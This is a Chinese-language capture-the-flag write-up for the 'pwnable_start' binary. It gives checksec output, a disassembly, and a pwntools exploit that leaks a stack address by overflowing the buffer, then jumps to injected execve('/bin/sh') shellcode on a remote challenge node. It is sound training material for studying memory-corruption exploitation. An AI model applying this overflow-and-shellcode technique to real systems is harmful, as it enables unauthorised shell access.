pwnable_start
Ubuntu 16 来源:https://github.com/bash-c/pwn_repo
0x01
checksec
1
2
3
4
5
6
| [*] '/home/zelas/Desktop/pwn/pwnable_start/start'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
|
无保护
静态编译
└─$ file start
start: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
IDA
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| .text:08048060 public _start
.text:08048060 _start proc near ; DATA XREF: LOAD:08048018↑o
.text:08048060 push esp
.text:08048061 push offset _exit
.text:08048066 xor eax, eax
.text:08048068 xor ebx, ebx
.text:0804806A xor ecx, ecx
.text:0804806C xor edx, edx
.text:0804806E push 3A465443h
.text:08048073 push 20656874h
.text:08048078 push 20747261h
.text:0804807D push 74732073h
.text:08048082 push 2774654Ch
.text:08048087 mov ecx, esp ; addr
.text:08048089 mov dl, 14h ; len
.text:0804808B mov bl, 1 ; fd
.text:0804808D mov al, 4
.text:0804808F int 80h ; LINUX - sys_write
.text:08048091 xor ebx, ebx
.text:08048093 mov dl, 3Ch ; '<'
.text:08048095 mov al, 3
.text:08048097 int 80h ; LINUX - sys_read
.text:08048099 add esp, 14h //read(3,buf,0x3c) buf[esp-0x14]
.text:0804809C retn
.text:0804809C _start endp ; sp-analysis failed
|
0x02
思路
1.栈溢出泄露栈上地址
2.向栈上写入shellcode
3.再次溢出执行shellcode
0x03
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| from pwn import *
context(arch='i386', os='linux', log_level='debug')
path = './start'
io = remote('node4.buuoj.cn', 29441)
padding = 0x14
write = 0x8048087
payload = flat(b'a' * padding, write)
io.sendlineafter(b"Let's start the CTF:", payload)
stack = u32(io.recv(4))
print('[+] stack_address -->', hex(stack))
shellcode = asm('xor ecx,ecx;xor edx,edx;push edx;push 0x68732f6e;push 0x69622f2f;mov ebx,esp;mov al,0xb;int 0x80')
payload = flat(b'a' * padding, stack + padding, shellcode)
io.sendline(payload)
pause()
io.interactive()
|
